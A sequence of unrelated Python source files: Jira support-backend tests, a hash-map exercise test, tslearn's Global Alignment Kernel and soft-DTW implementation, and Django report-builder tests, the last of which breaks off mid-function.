c.MarathonSpawner.cpu_limit = 1
c.JupyterHub.authenticator_class = 'dummyauthenticator.DummyAuthenticator'
|
497952 | import json
from unittest import mock, skip
import jira
from django.test import TestCase
from django.utils import timezone
from jira import User
from waldur_core.core.utils import datetime_to_timestamp
from waldur_mastermind.support import models
from waldur_mastermind.support.backend.atlassian import ServiceDeskBackend
from waldur_mastermind.support.tests import factories, fixtures
from waldur_mastermind.support.tests.base import load_resource
class BaseBackendTest(TestCase):
def setUp(self):
super(BaseBackendTest, self).setUp()
self.fixture = fixtures.SupportFixture()
self.backend = ServiceDeskBackend()
jira_patcher = mock.patch('waldur_jira.backend.JIRA')
self.mocked_jira = jira_patcher.start()()
self.mocked_jira.fields.return_value = json.loads(
load_resource('jira_fields.json')
)
mock_backend_users = [
User({'server': ''}, None, raw={'key': 'user_1', 'active': True})
]
self.mocked_jira.waldur_search_users.return_value = mock_backend_users
def tearDown(self):
super(BaseBackendTest, self).tearDown()
mock.patch.stopall()
class IssueCreateTest(BaseBackendTest):
def setUp(self):
super(IssueCreateTest, self).setUp()
issue = self.fixture.issue
issue.type = 'Task'
issue.priority = 'Major'
issue.save()
self.issue = issue
factories.RequestTypeFactory(issue_type_name=issue.type)
self.mocked_jira.waldur_create_customer_request.return_value = mock.Mock(
**{
'key': 'TST-101',
'fields.assignee.key': '',
'fields.assignee.name': '',
'fields.assignee.emailAddress': '',
'fields.assignee.displayName': '',
'fields.creator.key': '',
'fields.creator.name': '',
'fields.creator.emailAddress': '',
'fields.creator.displayName': '',
'fields.reporter.key': '',
'fields.reporter.name': '',
'fields.reporter.emailAddress': '',
'fields.reporter.displayName': '',
'fields.resolutiondate': '',
'fields.summary': '',
'fields.description': '',
'fields.status.name': '',
'fields.resolution': '',
'fields.priority.name': 'Major',
'fields.issuetype.name': 'Task',
'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA
'fields.field104': 'Critical', # Impact
'permalink()': '',
}
)
self.mocked_jira.waldur_create_customer_request.return_value.permalink.return_value = (
'http://example.com/TST-101'
)
def test_user_for_caller_is_created(self):
self.mocked_jira.waldur_search_users.return_value = []
self.backend.create_issue(self.issue)
self.mocked_jira.create_customer.assert_called_once_with(
self.issue.caller.email, self.issue.caller.full_name
)
@skip(
'Skip till the correct behaviour for requestParticipant reference is assured.'
)
def test_caller_is_specified_in_custom_field(self):
self.backend.create_issue(self.issue)
kwargs = self.mocked_jira.create_customer_request.call_args[0][0]
self.assertEqual(
kwargs['requestParticipants'],
[self.issue.caller.supportcustomer.backend_id],
)
def test_original_reporter_is_specified_in_custom_field(self):
self.backend.create_issue(self.issue)
kwargs = self.mocked_jira.waldur_create_customer_request().update.call_args[1]
self.assertEqual(kwargs['field102'], self.issue.reporter.name)
class IssueUpdateTest(BaseBackendTest):
def setUp(self):
super(IssueUpdateTest, self).setUp()
self.mocked_jira.issue.return_value = mock.Mock(
**{
'key': 'TST-101',
'fields.assignee.key': '',
'fields.assignee.name': '',
'fields.assignee.emailAddress': '',
'fields.assignee.displayName': '',
'fields.creator.key': '',
'fields.creator.name': '',
'fields.creator.emailAddress': '',
'fields.creator.displayName': '',
'fields.reporter.key': '',
'fields.reporter.name': '',
'fields.reporter.emailAddress': '',
'fields.reporter.displayName': '',
'fields.resolutiondate': '',
'fields.summary': '',
'fields.description': '',
'fields.status.name': '',
'fields.resolution': '',
'fields.priority.name': 'Major',
'fields.issuetype.name': 'Task',
'fields.field103.ongoingCycle.breachTime.epochMillis': 1000, # SLA
'fields.field104': 'Critical', # Impact
}
)
self.mocked_jira.issue.return_value.permalink.return_value = (
'http://example.com/TST-101'
)
def test_sla_is_populated(self):
# Arrange
issue = self.fixture.issue
dt = timezone.now().replace(microsecond=0)
ts = datetime_to_timestamp(dt) * 1000
self.mocked_jira.issue.return_value.fields.field103.ongoingCycle.breachTime.epochMillis = (
ts
)
# Act
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
# Assert
self.assertEqual(issue.first_response_sla, dt)
def test_assignee_is_populated(self):
issue = self.fixture.issue
self.mocked_jira.issue.return_value.fields.assignee.key = '<EMAIL>'
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.assignee.backend_id, '<EMAIL>')
def test_reporter_is_populated(self):
issue = self.fixture.issue
self.mocked_jira.issue.return_value.fields.reporter.key = '<EMAIL>'
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.reporter.backend_id, '<EMAIL>')
def test_issue_is_resolved(self):
issue = self.fixture.issue
resolution_date = timezone.now()
self.mocked_jira.issue.return_value.fields.status.name = 'Resolved'
self.mocked_jira.issue.return_value.fields.resolutiondate = resolution_date
self.backend.update_issue_from_jira(issue)
issue.refresh_from_db()
self.assertEqual(issue.resolution_date, resolution_date)
class CommentCreateTest(BaseBackendTest):
def setUp(self):
super(CommentCreateTest, self).setUp()
self.comment = self.fixture.comment
class Response:
status_code = 201
def json(self):
return {'id': '10001'}
self.mocked_jira._session.post.return_value = Response()
def create_comment(self):
self.backend.create_comment(self.comment)
kwargs = self.mocked_jira._session.post.call_args[1]
data = json.loads(kwargs['data'])
return data
def test_backend_id_is_populated(self):
self.create_comment()
self.comment.refresh_from_db()
self.assertEqual(self.comment.backend_id, '10001')
def test_original_author_is_specified(self):
self.comment.description = 'Comment description'
self.comment.save()
user = self.comment.author.user
user.full_name = '<NAME>'
user.civil_number = None
user.save()
data = self.create_comment()
self.assertEqual('[Alice Lebowski]: Comment description', data['body'])
def test_internal_flag_is_specified(self):
self.comment.is_public = False
self.comment.save()
data = self.create_comment()
expected = [{'key': 'sd.public.comment', 'value': {'internal': True}}]
self.assertEqual(expected, data['properties'])
def test_of_author_when_create_comment_from_jira(self):
issue = factories.IssueFactory()
backend_comment_raw = json.loads(load_resource('jira_comment_raw.json'))
self.backend_comment = jira.resources.Comment(
{'server': 'example.com'}, None, backend_comment_raw
)
self.mocked_jira.comment.return_value = self.backend_comment
self.backend.create_comment_from_jira(issue, self.backend_comment.id)
comment = models.Comment.objects.get(issue=issue)
self.assertEqual(comment.author.backend_id, 'user')
class CommentUpdateTest(BaseBackendTest):
def setUp(self):
super(CommentUpdateTest, self).setUp()
self.mocked_jira.comment.return_value = mock.Mock(
**{
'body': '[<NAME>]: New comment description',
'author': mock.Mock(**{'key': '<EMAIL>'}),
}
)
self.mocked_jira._session.get.return_value.json.return_value = {
'value': {'internal': True}
}
def test_description_is_updated(self):
# Arrange
comment = self.fixture.comment
comment.description = 'Old comment description'
comment.save()
# Act
self.backend.update_comment_from_jira(comment)
# Assert
comment.refresh_from_db()
self.assertEqual(comment.description, 'New comment description')
def test_author_is_populated(self):
comment = self.fixture.comment
self.backend.update_comment_from_jira(comment)
comment.refresh_from_db()
self.assertEqual(comment.author.backend_id, '<EMAIL>')
def test_internal_flag_is_updated(self):
# Arrange
comment = self.fixture.comment
comment.is_public = True
comment.save()
# Act
self.backend.update_comment_from_jira(comment)
# Assert
comment.refresh_from_db()
self.assertFalse(comment.is_public)
|
497976 | import unittest
from dojo import *
class DojoTest(unittest.TestCase):
def test_true(self):
self.assertTrue(main())
def teste_hash_1(self):
self.assertEqual(MyHashMap._hash(53), 5)
def teste_hash_2(self):
self.assertEqual(MyHashMap._hash(56), 0)
def test_get_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
self.assertEqual(my_hmap.get(53), "Olá")
def teste_get_2(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(my_hmap.get(54), "Tudo bem")
def teste_get_3(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(my_hmap.get(5), None)
# def teste_len_1(self):
# my_hmap = MyHashMap()
# my_hmap.set(53, "Olá")
# my_hmap.set(54, "Tudo bem")
# self.assertEqual(my_hmap.len(), 2)
def teste_len_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(54, "Tudo bem")
self.assertEqual(len(my_hmap), 2)
def teste_repeated_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(53, "Tudo bem")
self.assertEqual(len(my_hmap), 1)
self.assertEqual(my_hmap.get(53), "Tudo bem")
def test_delete_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(5, "Tudo bem")
self.assertEqual(len(my_hmap), 2)
self.assertEqual(my_hmap.get(53), "Olá")
print(my_hmap.arr)
my_hmap.delete(5)
self.assertEqual(len(my_hmap), 1)
self.assertEqual(my_hmap.get(5), None)
print(my_hmap.arr)
if __name__ == "__main__":
unittest.main()
|
497984 | import numpy
from joblib import Parallel, delayed
from numba import njit
from scipy.spatial.distance import pdist, cdist
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.utils import check_random_state
from tslearn.utils import to_time_series, to_time_series_dataset, ts_size, \
check_equal_size
from .utils import _cdist_generic
from .dtw_variants import dtw, dtw_path
from .soft_dtw_fast import _soft_dtw, _soft_dtw_grad, \
_jacobian_product_sq_euc
__author__ = '<NAME> <EMAIL>[at]<EMAIL>'
GLOBAL_CONSTRAINT_CODE = {None: 0, "": 0, "itakura": 1, "sakoe_chiba": 2}
TSLEARN_VALID_METRICS = ["dtw", "gak", "softdtw", "sax"]
VARIABLE_LENGTH_METRICS = ["dtw", "gak", "softdtw", "sax"]
@njit(nogil=True)
def njit_gak(s1, s2, gram):
l1 = s1.shape[0]
l2 = s2.shape[0]
cum_sum = numpy.zeros((l1 + 1, l2 + 1))
cum_sum[0, 0] = 1.
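    # Dynamic-programming recursion of the Global Alignment kernel: an alignment may
    # advance in s1, in s2, or in both, each path weighted by the local kernel value.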
for i in range(l1):
for j in range(l2):
cum_sum[i + 1, j + 1] = (cum_sum[i, j + 1] +
cum_sum[i + 1, j] +
cum_sum[i, j]) * gram[i, j]
return cum_sum[l1, l2]
def _gak_gram(s1, s2, sigma=1.):
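    # Local kernel of GAK: with k(x, y) = exp(-||x - y||^2 / (2 * sigma^2)), the
    # returned matrix is k / (2 - k), computed in log-space for numerical stability.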
gram = - cdist(s1, s2, "sqeuclidean") / (2 * sigma ** 2)
gram -= numpy.log(2 - numpy.exp(gram))
return numpy.exp(gram)
def unnormalized_gak(s1, s2, sigma=1.):
r"""Compute Global Alignment Kernel (GAK) between (possibly
multidimensional) time series and return it.
It is not required that both time series share the same size, but they must
be the same dimension. GAK was
originally presented in [1]_.
This is an unnormalized version.
Parameters
----------
s1
A time series
s2
Another time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
Returns
-------
float
Kernel value
Examples
--------
>>> unnormalized_gak([1, 2, 3],
... [1., 2., 2., 3.],
... sigma=2.) # doctest: +ELLIPSIS
15.358...
>>> unnormalized_gak([1, 2, 3],
... [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS
3.166...
See Also
--------
gak : normalized version of GAK that ensures that k(x,x) = 1
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
s1 = to_time_series(s1, remove_nans=True)
s2 = to_time_series(s2, remove_nans=True)
gram = _gak_gram(s1, s2, sigma=sigma)
gak_val = njit_gak(s1, s2, gram)
return gak_val
def gak(s1, s2, sigma=1.): # TODO: better doc (formula for the kernel)
r"""Compute Global Alignment Kernel (GAK) between (possibly
multidimensional) time series and return it.
It is not required that both time series share the same size, but they must
be the same dimension. GAK was
originally presented in [1]_.
This is a normalized version that ensures that :math:`k(x,x)=1` for all
:math:`x` and :math:`k(x,y) \in [0, 1]` for all :math:`x, y`.
Parameters
----------
s1
A time series
s2
Another time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
Returns
-------
float
Kernel value
Examples
--------
>>> gak([1, 2, 3], [1., 2., 2., 3.], sigma=2.) # doctest: +ELLIPSIS
0.839...
>>> gak([1, 2, 3], [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS
0.273...
See Also
--------
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
denom = numpy.sqrt(unnormalized_gak(s1, s1, sigma=sigma) *
unnormalized_gak(s2, s2, sigma=sigma))
return unnormalized_gak(s1, s2, sigma=sigma) / denom
def cdist_gak(dataset1, dataset2=None, sigma=1., n_jobs=None, verbose=0):
r"""Compute cross-similarity matrix using Global Alignment kernel (GAK).
GAK was originally presented in [1]_.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See scikit-learns'
`Glossary <https://scikit-learn.org/stable/glossary.html#term-n-jobs>`__
for more details.
verbose : int, optional (default=0)
The verbosity level: if non zero, progress messages are printed.
Above 50, the output is sent to stdout.
The frequency of the messages increases with the verbosity level.
        If it is more than 10, all iterations are reported.
        See joblib's `parallel documentation
        <https://joblib.readthedocs.io/en/latest/parallel.html#parallel-reference-documentation>`__
        for more details.
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> cdist_gak([[1, 2, 2, 3], [1., 2., 3., 4.]], sigma=2.)
array([[1. , 0.65629661],
[0.65629661, 1. ]])
>>> cdist_gak([[1, 2, 2], [1., 2., 3., 4.]],
... [[1, 2, 2, 3], [1., 2., 3., 4.], [1, 2, 2, 3]],
... sigma=2.)
array([[0.71059484, 0.29722877, 0.71059484],
[0.65629661, 1. , 0.65629661]])
See Also
--------
gak : Compute Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
""" # noqa: E501
unnormalized_matrix = _cdist_generic(dist_fun=unnormalized_gak,
dataset1=dataset1,
dataset2=dataset2,
n_jobs=n_jobs,
verbose=verbose,
sigma=sigma,
compute_diagonal=True)
dataset1 = to_time_series_dataset(dataset1)
if dataset2 is None:
diagonal = numpy.diag(numpy.sqrt(1. / numpy.diag(unnormalized_matrix)))
diagonal_left = diagonal_right = diagonal
else:
dataset2 = to_time_series_dataset(dataset2)
diagonal_left = Parallel(n_jobs=n_jobs,
prefer="threads",
verbose=verbose)(
delayed(unnormalized_gak)(dataset1[i], dataset1[i], sigma=sigma)
for i in range(len(dataset1))
)
diagonal_right = Parallel(n_jobs=n_jobs,
prefer="threads",
verbose=verbose)(
delayed(unnormalized_gak)(dataset2[j], dataset2[j], sigma=sigma)
for j in range(len(dataset2))
)
diagonal_left = numpy.diag(1. / numpy.sqrt(diagonal_left))
diagonal_right = numpy.diag(1. / numpy.sqrt(diagonal_right))
return (diagonal_left.dot(unnormalized_matrix)).dot(diagonal_right)
def sigma_gak(dataset, n_samples=100, random_state=None):
r"""Compute sigma value to be used for GAK.
This method was originally presented in [1]_.
Parameters
----------
dataset
A dataset of time series
n_samples : int (default: 100)
Number of samples on which median distance should be estimated
random_state : integer or numpy.RandomState or None (default: None)
The generator used to draw the samples. If an integer is given, it
fixes the seed. Defaults to the global numpy random number generator.
Returns
-------
float
Suggested bandwidth (:math:`\sigma`) for the Global Alignment kernel
Examples
--------
>>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]]
>>> sigma_gak(dataset=dataset,
... n_samples=200,
... random_state=0) # doctest: +ELLIPSIS
2.0...
See Also
--------
gak : Compute Global Alignment kernel
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
random_state = check_random_state(random_state)
dataset = to_time_series_dataset(dataset)
n_ts, sz, d = dataset.shape
if not check_equal_size(dataset):
sz = numpy.min([ts_size(ts) for ts in dataset])
if n_ts * sz < n_samples:
replace = True
else:
replace = False
sample_indices = random_state.choice(n_ts * sz,
size=n_samples,
replace=replace)
dists = pdist(dataset[:, :sz, :].reshape((-1, d))[sample_indices],
metric="euclidean")
return numpy.median(dists) * numpy.sqrt(sz)
def gamma_soft_dtw(dataset, n_samples=100, random_state=None):
r"""Compute gamma value to be used for GAK/Soft-DTW.
This method was originally presented in [1]_.
Parameters
----------
dataset
A dataset of time series
n_samples : int (default: 100)
Number of samples on which median distance should be estimated
random_state : integer or numpy.RandomState or None (default: None)
The generator used to draw the samples. If an integer is given, it
fixes the seed. Defaults to the global numpy random number generator.
Returns
-------
float
Suggested :math:`\gamma` parameter for the Soft-DTW
Examples
--------
>>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]]
>>> gamma_soft_dtw(dataset=dataset,
... n_samples=200,
... random_state=0) # doctest: +ELLIPSIS
8.0...
See Also
--------
sigma_gak : Compute sigma parameter for Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
return 2. * sigma_gak(dataset=dataset,
n_samples=n_samples,
random_state=random_state) ** 2
def soft_dtw(ts1, ts2, gamma=1.):
r"""Compute Soft-DTW metric between two time series.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
ts1
A time series
ts2
Another time series
gamma : float (default 1.)
        Gamma parameter for Soft-DTW
Returns
-------
float
Similarity
Examples
--------
>>> soft_dtw([1, 2, 2, 3],
... [1., 2., 3., 4.],
... gamma=1.) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
-0.89...
>>> soft_dtw([1, 2, 3, 3],
... [1., 2., 2.1, 3.2],
... gamma=0.01) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
0.089...
See Also
--------
cdist_soft_dtw : Cross similarity matrix between time series datasets
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
if gamma == 0.:
return dtw(ts1, ts2) ** 2
return SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]),
gamma=gamma).compute()
def soft_dtw_alignment(ts1, ts2, gamma=1.):
r"""Compute Soft-DTW metric between two time series and return both the
similarity measure and the alignment matrix.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
ts1
A time series
ts2
Another time series
gamma : float (default 1.)
        Gamma parameter for Soft-DTW
Returns
-------
numpy.ndarray
Soft-alignment matrix
float
Similarity
Examples
--------
>>> a, dist = soft_dtw_alignment([1, 2, 2, 3],
... [1., 2., 3., 4.],
... gamma=1.) # doctest: +ELLIPSIS
>>> dist
-0.89...
>>> a # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
array([[1.00...e+00, 1.88...e-01, 2.83...e-04, 4.19...e-11],
[3.40...e-01, 8.17...e-01, 8.87...e-02, 3.94...e-05],
[5.05...e-02, 7.09...e-01, 5.30...e-01, 6.98...e-03],
[1.37...e-04, 1.31...e-01, 7.30...e-01, 1.00...e+00]])
See Also
--------
soft_dtw : Returns soft-DTW score alone
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
if gamma == 0.:
path, dist = dtw_path(ts1, ts2)
dist_sq = dist ** 2
a = numpy.zeros((ts_size(ts1), ts_size(ts2)))
for i, j in path:
a[i, j] = 1.
else:
sdtw = SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]),
gamma=gamma)
dist_sq = sdtw.compute()
a = sdtw.grad()
return a, dist_sq
def cdist_soft_dtw(dataset1, dataset2=None, gamma=1.):
r"""Compute cross-similarity matrix using Soft-DTW metric.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
gamma : float (default 1.)
        Gamma parameter for Soft-DTW
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01)
array([[-0.01098612, 1. ],
[ 1. , 0. ]])
>>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]],
... [[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01)
array([[-0.01098612, 1. ],
[ 1. , 0. ]])
See Also
--------
soft_dtw : Compute Soft-DTW
cdist_soft_dtw_normalized : Cross similarity matrix between time series
datasets using a normalized version of Soft-DTW
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
dataset1 = to_time_series_dataset(dataset1, dtype=numpy.float64)
self_similarity = False
if dataset2 is None:
dataset2 = dataset1
self_similarity = True
else:
dataset2 = to_time_series_dataset(dataset2, dtype=numpy.float64)
dists = numpy.empty((dataset1.shape[0], dataset2.shape[0]))
equal_size_ds1 = check_equal_size(dataset1)
equal_size_ds2 = check_equal_size(dataset2)
for i, ts1 in enumerate(dataset1):
if equal_size_ds1:
ts1_short = ts1
else:
ts1_short = ts1[:ts_size(ts1)]
for j, ts2 in enumerate(dataset2):
if equal_size_ds2:
ts2_short = ts2
else:
ts2_short = ts2[:ts_size(ts2)]
if self_similarity and j < i:
dists[i, j] = dists[j, i]
else:
dists[i, j] = soft_dtw(ts1_short, ts2_short, gamma=gamma)
return dists
def cdist_soft_dtw_normalized(dataset1, dataset2=None, gamma=1.):
r"""Compute cross-similarity matrix using a normalized version of the
Soft-DTW metric.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
This normalized version is defined as:
.. math::
\text{norm-soft-DTW}_{\gamma}(X, Y) =
\text{soft-DTW}_{\gamma}(X, Y) -
\frac{1}{2} \left(\text{soft-DTW}_{\gamma}(X, X) +
\text{soft-DTW}_{\gamma}(Y, Y)\right)
and ensures that all returned values are positive and that
:math:`\text{norm-soft-DTW}_{\gamma}(X, X) = 0`.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
gamma : float (default 1.)
        Gamma parameter for Soft-DTW
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> time_series = numpy.random.randn(10, 15, 1)
>>> numpy.alltrue(cdist_soft_dtw_normalized(time_series) >= 0.)
True
See Also
--------
soft_dtw : Compute Soft-DTW
cdist_soft_dtw : Cross similarity matrix between time series
datasets using the unnormalized version of Soft-DTW
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
dists = cdist_soft_dtw(dataset1, dataset2=dataset2, gamma=gamma)
d_ii = numpy.diag(dists)
dists -= .5 * (d_ii.reshape((-1, 1)) + d_ii.reshape((1, -1)))
return dists
class SoftDTW:
def __init__(self, D, gamma=1.):
"""
Parameters
----------
gamma: float
Regularization parameter.
Lower is less smoothed (closer to true DTW).
Attributes
----------
self.R_: array, shape = [m + 2, n + 2]
Accumulated cost matrix (stored after calling `compute`).
"""
if hasattr(D, "compute"):
self.D = D.compute()
else:
self.D = D
self.D = self.D.astype(numpy.float64)
# Allocate memory.
# We need +2 because we use indices starting from 1
# and to deal with edge cases in the backward recursion.
m, n = self.D.shape
self.R_ = numpy.zeros((m + 2, n + 2), dtype=numpy.float64)
self.computed = False
self.gamma = numpy.float64(gamma)
def compute(self):
"""Compute soft-DTW by dynamic programming.
Returns
-------
sdtw: float
soft-DTW discrepancy.
"""
m, n = self.D.shape
_soft_dtw(self.D, self.R_, gamma=self.gamma)
self.computed = True
return self.R_[m, n]
def grad(self):
"""Compute gradient of soft-DTW w.r.t. D by dynamic programming.
Returns
-------
grad: array, shape = [m, n]
Gradient w.r.t. D.
"""
if not self.computed:
raise ValueError("Needs to call compute() first.")
m, n = self.D.shape
# Add an extra row and an extra column to D.
# Needed to deal with edge cases in the recursion.
D = numpy.vstack((self.D, numpy.zeros(n)))
D = numpy.hstack((D, numpy.zeros((m + 1, 1))))
# Allocate memory.
# We need +2 because we use indices starting from 1
# and to deal with edge cases in the recursion.
E = numpy.zeros((m + 2, n + 2), dtype=numpy.float64)
_soft_dtw_grad(D, self.R_, E, gamma=self.gamma)
return E[1:-1, 1:-1]
class SquaredEuclidean:
def __init__(self, X, Y):
"""
Parameters
----------
X: array, shape = [m, d]
First time series.
Y: array, shape = [n, d]
Second time series.
Examples
--------
>>> SquaredEuclidean([1, 2, 2, 3], [1, 2, 3, 4]).compute()
array([[0., 1., 4., 9.],
[1., 0., 1., 4.],
[1., 0., 1., 4.],
[4., 1., 0., 1.]])
"""
self.X = to_time_series(X).astype(numpy.float64)
self.Y = to_time_series(Y).astype(numpy.float64)
def compute(self):
"""Compute distance matrix.
Returns
-------
D: array, shape = [m, n]
Distance matrix.
"""
return euclidean_distances(self.X, self.Y, squared=True)
def jacobian_product(self, E):
"""Compute the product between the Jacobian
(a linear map from m x d to m x n) and a matrix E.
Parameters
----------
E: array, shape = [m, n]
Second time series.
Returns
-------
G: array, shape = [m, d]
Product with Jacobian
([m x d, m x n] * [m x n] = [m x d]).
"""
G = numpy.zeros_like(self.X, dtype=numpy.float64)
_jacobian_product_sq_euc(self.X, self.Y, E.astype(numpy.float64), G)
return G
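# --- Minimal usage sketch (not part of the original module) ---
# It only illustrates how the helpers above compose: gamma_soft_dtw() suggests
# a smoothing parameter, soft_dtw() returns the discrepancy, and the
# SoftDTW / SquaredEuclidean pair exposes the gradient w.r.t. the pairwise
# distance matrix. The toy series below are arbitrary.
if __name__ == "__main__":
    ts_a = [1., 2., 2., 3.]
    ts_b = [1., 2., 3., 4.]
    gamma = gamma_soft_dtw([ts_a, ts_b], n_samples=10, random_state=0)
    print("suggested gamma:", gamma)
    print("soft-DTW:", soft_dtw(ts_a, ts_b, gamma=gamma))
    # gradient of soft-DTW w.r.t. the squared-Euclidean distance matrix
    sdtw = SoftDTW(SquaredEuclidean(ts_a, ts_b), gamma=gamma)
    sdtw.compute()
    print("alignment gradient shape:", sdtw.grad().shape)  # (4, 4)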
|
498004 | from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.test import TestCase
from ..utils import (
get_properties_from_model, get_direct_fields_from_model,
get_relation_fields_from_model, get_model_from_path_string)
from ..mixins import GetFieldsMixin
from ..models import Report, DisplayField, FilterField
from report_builder_demo.demo_models.models import (
Bar, Restaurant, Waiter, Comment, Place)
class RelationUtilityFunctionTests(TestCase):
def test_a_initial_rel_field_name(self):
"""
Test that the initial assumption about the ManyToOneRel field_name is
correct
"""
field_name = (
Waiter.restaurant.field.rel.field_name
if hasattr(Waiter.restaurant.field, 'rel')
else Waiter.restaurant.field.target_field.name
)
self.assertEquals(field_name, "place")
def test_get_relation_fields_from_model_does_not_change_field_name(self):
"""
Make sure that getting related_fields doesn't overwrite field_name
Waiter has a ForeignKey to Restaurant.
The relation from Restaurant to Waiter is a ManyToOneRel object.
'place' is the PK of Restaurant. The ManyToOneRel field_name should be
the same at the PK, unless to_field is set on the ForeignKey.
ManyToManyRel objects are not affected.
"""
get_relation_fields_from_model(Restaurant)
field_name = (
Waiter.restaurant.field.rel.field_name
if hasattr(Waiter.restaurant.field, 'rel')
else Waiter.restaurant.field.target_field.name
)
self.assertEquals(field_name, "place")
# Waiter.restaurant.field.rel.get_related_field()
class UtilityFunctionTests(TestCase):
def setUp(self):
self.report_ct = ContentType.objects.get_for_model(Report)
self.report = Report.objects.create(
name="foo report",
root_model=self.report_ct)
self.filter_field = FilterField.objects.create(
report=self.report,
field="X",
field_verbose="stuff",
filter_type='contains',
filter_value='Lots of spam')
def get_fields_names(self, fields):
return [field.name for field in fields]
def test_get_relation_fields_from_model(self):
fields = get_relation_fields_from_model(Report)
names = self.get_fields_names(fields)
self.assertTrue('displayfield' in names or 'report_builder:displayfield' in names)
self.assertTrue('filterfield' in names or 'report_builder:filterfield' in names)
self.assertTrue('root_model' in names)
self.assertEquals(len(names), 7)
def test_get_model_from_path_string(self):
result = get_model_from_path_string(Restaurant, 'waiter__name')
self.assertEqual(result, Waiter)
def test_get_model_from_path_string_one_to_one(self):
"""Test that one-to-one relationships don't break this function"""
result = get_model_from_path_string(Restaurant, 'place__serves_pizza')
self.assertEqual(result, Place)
def test_get_direct_fields_from_model(self):
